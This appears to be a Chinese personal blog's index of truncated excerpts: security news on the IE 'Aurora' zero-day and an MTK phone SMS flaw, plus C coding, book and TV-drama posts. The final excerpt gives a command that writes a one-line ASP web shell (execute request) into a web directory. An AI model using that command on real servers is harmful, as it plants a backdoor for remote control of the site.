Pray's Blog

　　微软针对黑客用来攻击Google及其它33家公司的IE零日漏洞发布紧急更新。 　　这是微软2010年首次发布非常规补丁，按照常规，微软将于2月份第二周周二发布漏洞补丁。目前针对极光漏洞的病毒疫情十分紧急，短短3天内，极光漏洞已经迅速被国内黑客广泛用于网站挂马，目前已有大约70%的挂马网站利用这一漏洞传播各类恶意软件。微软已向所有MAPP成员发...阅读更多

《不抱怨的世界》-威尔·鲍温著　　点击下载 　　《不抱怨的世界》是畅销全球80国的世界级励志书！世界500强企业团购率第1！冯仑、唐骏、张德芬、奥普拉感动推荐！美国亚马逊、台湾金石堂、诚品书店心灵励志新书销量第1名！ 　　抱怨是最消耗能量的无益举动。有时候，我们的抱怨不仅会针对人、也会针对不同的生活情境，表示我们的不满。而且如果找不到...阅读更多

此0day漏洞存在于IE浏览器，且可导致远程代码执行 研究发现Windows 2000 SP4上(以下省去Windows)的IE 5.1 SP4不受此影响；而以下IE版本（无论是32位还是64位）均受此漏洞影响： 2000 SP4上的 IE6 SP1 XP、Server 2003、Vista、Server 2008、7、Server 2008 R2上的IE6、IE7、IE8 此漏洞存在于IE无效的指针引用。当对象被删除后，在一定的条件下可以访...阅读更多

TechWeb旗下的DarkReading发表文章，透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明，承认McAfee所说的IE漏洞才是祸源。 文章还给出了一个链接，指向开源渗透测试工具项目Metasploit的博客，上面给出了利用这个IE漏洞的攻击代码链接。代码如下： 去混淆后的代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ...阅读更多

　　我们先用下面的结构来描述一个对象： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 　typedef struct _ClassType 　　{ 　　char* name; /*对象名，唯一*/ 　　int object_size;/*对象大小，创建实列时分配内存要用到*/ 　　int class_size; /*全部虚函数大小，如sizeof(CObjectClass)*/ 　　void* vclass; /*虚函数指针*/ 　　void (*Init...阅读更多

　　这几天迷上一部电视剧(神话)，每天更新3集，但胡歌主演，还是坚持在看，他演的古装片我都挺喜欢，部分凄美的爱情，英雄的传奇，历史史诗为一身，还真羡慕这些角色。   主要演员： 　　胡歌——易小川 / 蒙毅 　　白冰——玉漱公主 　　张世——高要 / 赵高 　　张萌——高岚 / 虞姬 / 小月 　　任泉——易大川 　　谭凯——项羽 　　金莎——吕素 　　张卫——高...阅读更多

　　写在09年的最后一天，以纪念，即将逝去的一年。或者说，这是一种自我安慰，想挽留着这一年的时光。 　　09年最后一天里，在家乡度过的，阴沉沉的天，冷冷的天气，见不到阳光的微笑。今天适合坐在家里，看看书，回忆些09年的往事，可脑子不听使唤，回忆总是绕着代码那里徘徊。 　　今天的流走，时光的飞逝，大家在这一年收获的不少东西吧。     　...阅读更多

影响手机品牌：所有MTK方案手机（也就是我们常说的山寨手机） 且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能（大部分山寨手机都有此功能） 漏洞原理： 在大部分MTK方案手机中，编写短信息的时候可以插入一种“imy”格式的铃声文件， 而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声 由于MTK方案手机在...阅读更多

Iconfinder 这是其中一个最好的图标搜索引擎，在它们的数据库里面存储了超过1000多个图标资源，你可以输入一个你需要的相关的图标关键词进行搜索。 其Ajax的导航，使一件轻而易举的找到新的图标。每个图标在搜索结果中进行，其标记，下载链接和许可证信息。 无需翻阅页面得到下载图标，击中下载图标，该图标将被下载。大部分的图标漂亮，可以用来在现...阅读更多

SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家能分享出来. 1、NBSI的命令方法:写入一句话木SHELL,命令如下: 1 echo ^<25%execute request("#")25%^> >d:\web\mm.asp 这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop &...阅读更多